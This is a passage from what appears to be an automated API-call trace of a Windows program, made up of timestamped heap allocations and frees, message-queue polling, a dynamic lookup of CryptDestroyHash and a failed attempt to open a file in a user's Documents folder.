lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.102] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.102] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.102] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.102] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.103] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.103] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0263.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.104] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0263.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.105] CryptDestroyHash (hHash=0xaa5760) returned 1 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0263.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.107] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0263.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Kji1x-v4FT0kOOxbY6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kji1x-v4ft0kooxby6"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0263.111] GetLastError () returned 0x5 [0263.111] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0263.111] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.111] PeekMessageW (in: 